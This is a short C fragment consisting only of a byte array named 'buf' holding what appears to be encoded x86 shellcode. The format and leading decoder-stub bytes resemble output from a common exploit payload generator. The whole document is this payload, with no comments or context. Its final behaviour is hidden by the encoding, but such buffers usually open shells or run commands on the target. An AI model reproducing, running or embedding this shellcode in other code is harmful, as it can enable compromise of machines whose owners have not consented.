unsigned char buf[] = 
"\xbb\xea\x24\x16\x89\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9"
"\xb1\x3c\x31\x5a\x13\x83\xc2\x04\x03\x5a\xe5\xc6\xe3\xd5"
"\x81\x64\x34\xba\x09\x59\x77\x1e\x91\xa9\x47\xc2\x19\xfa"
"\x97\xa6\xa1\xca\xe7\x0a\x29\x49\x6a\xef\xb1\xbd\x5a\x53"
"\x39\x8e\xaa\x37\xc1\xde\xfa\x9b\x49\x2f\xcb\x7f\xd1\x2d"
"\x12\xdc\x59\x82\x54\x80\xe1\x83\xa4\x64\x69\x74\xf1\xc8"
"\xf1\x44\xc1\xac\x79\xc7\x50\x11\x01\x33\xa3\xf5\x89\x0b"
"\xf3\x59\x11\x5c\xc3\x3d\x99\xac\x13\xe2\x21\xae\x37\x46"
"\xa9\x08\x88\x2a\x31\x08\xd9\x8e\xb9\xfa\x29\x73\x41\x9a"
"\x79\xd7\xc9\x6c\x4e\xbb\x51\xbd\x96\x1f\xd9\x85\xd5\xc3"
"\x61\x93\x29\xa0\xe9\x6b\x7b\x04\x71\xb4\x48\xe8\xf9\xa2"
"\x96\x4c\x81\x1a\xd7\x30\x09\x6c\x23\x95\x91\xa2\x28\x79"
"\x19\xa1\x96\xdd\xa1\x15\xd6\x81\x29\x66\x28\x66\xb1\xb6"
"\x78\xca\x39\x87\x48\xae\xc1\x85\xca\x12\x49\x7a\x3a\xf7"
"\xd1\x4a\x0c\x5b\x59\x9b\x5c\x3f\xe1\xeb\xac\xe3\x69\x6f"
"\xa9\x47\xf1\x57\x01\x24\x79\xca\x59\x88\x01\x3a\xab\x6c"
"\x89\x0a\xfb\xd0\x11\x5b\xcb\xb4\x99\xab\x1b\x19\x21\xae"
"\x39\xfd\xa9\x1e\x8e\xa1\x31\x6f\xde\x05\xb9\xbf\x2e\xea"
"\x41\xf0\x7e\x4e\xc9\x93\x1a\x32\x51\x6c\xd3\xc0";

